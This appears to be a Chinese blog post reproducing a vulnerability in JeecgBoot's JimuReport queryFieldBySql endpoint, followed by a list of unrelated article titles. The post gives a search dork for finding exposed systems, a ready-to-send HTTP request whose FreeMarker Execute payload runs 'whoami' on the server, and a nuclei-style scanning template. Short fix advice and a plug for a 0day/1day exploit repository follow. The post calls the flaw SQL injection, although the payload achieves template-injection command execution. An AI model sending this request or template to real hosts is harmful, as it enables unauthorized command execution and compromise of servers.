当前位置: 首页 > news >正文

【漏洞复现】JeecgBoot 积木报表 queryFieldBySql sql注入漏洞


》》》产品描述《《《

        积木报表,是一款免费的企业级Web报表工具,像搭建积木一样在线设计报表!功能涵盖,数据报表、打印设计、图表报表、大屏设计等!


》》》漏洞描述《《《

        JeecgBoot 积木报表 queryFieldBySq| 接口存在一个 SQL 注入漏洞,通过这个漏洞可以操纵服务器的数据库。这意味着不法分子可以利用这个漏洞来获取对数据库的完全控制权,从而查看、修改甚至删除数据库中的数据,严重威胁系统的安全性。


》》》搜索语句《《《

title="Jeecg-Boot 快速开发平台" || body="积木报表"


》》》漏洞复现《《《

POST /jmreport/queryFieldBySql HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Content-Length: 100
Content-Type: application/json; charset=utf-8
Accept-Encoding: gzip, deflate, br
Connection: keep-alive{"sql":"select '<#assign value=\"freemarker.template.utility.Execute\"?new()>${value(\"whoami\")}'"}

yaml

id: JeecgBoot 积木报表 queryFieldBySqlinfo:name: JeecgBoot 积木报表 queryFieldBySqlauthor: Kelicehnseverity: highhttp:- raw:- |POST /jmreport/queryFieldBySql HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36Content-Length: 100Content-Type: application/json; charset=utf-8Accept-Encoding: gzip, deflate, brConnection: keep-alive{"sql":"select '<#assign value=\"freemarker.template.utility.Execute\"?new()>${value(\"whoami\")}'"}matchers-condition: andmatchers:- type: statusstatus:- 200- type: wordwords:- "freemarker.template.utility.Execute"- "$(whoami)"

》》》修复建议《《《

1、如非必要,禁止公网访问该系统。
2、通过防火墙等安全设备设置访问策略,设置白名单访问。
3、升级产品到最新版本


-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

更多最新0day/1day POC&EXP移步----->Kelichen1113/POC-EXP (github.com)

-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

http://www.lryc.cn/news/451314.html

相关文章:

  • Qt6 中相对于 Qt5 的新增特性及亮点
  • 超轻巧modbus调试助手使用说明
  • Percona Monitoring and Management
  • WarehouseController
  • 基于 STM32 单片机的温室物理无害生长系统
  • 新版pycharm如何导入自定义环境
  • 一文彻底搞懂多模态 - 多模态理解+视觉大模型+多模态检索
  • 提升效率的编程世界探索与体验
  • VMware tools菜单为灰色无法安装
  • 不相同的二叉搜索树
  • 毕业论文设计javaweb+VUE高校教师信息管理系统
  • L0-Python-关卡材料提交
  • 【unity进阶知识6】Resources的使用,如何封装一个Resources资源管理器
  • ThreadLocal内存泄漏分析
  • 第 30 章 XML
  • VMware下的ubuntu显示文字太小的自适应显示调整
  • 外贸网站怎么搭建对谷歌seo比较好?
  • 如何创建网络白名单
  • 前端动态创建svg不起效果?
  • 三、Drf request对象
  • CMIS5.2_光模块切应用(Application Selection and Instantiation)
  • 网络安全 DVWA通关指南 DVWA Weak Session IDs(弱会话)
  • 828华为云征文|华为云 Flexus X 实例初体验
  • 欧科云链OKLink相约TOKEN2049:更全面、多元与安全
  • 遥感影像-语义分割数据集:云数据集详细介绍及训练样本处理流程
  • 【有啥问啥】SimAM(Similarity-Aware Activation Module)注意力机制详解
  • 鸿蒙应用开发,如何保存登录信息
  • ★ C++进阶篇 ★ map和set
  • Python知识点:如何使用Nvidia Jetson与Python进行边缘计算
  • 动态分配内存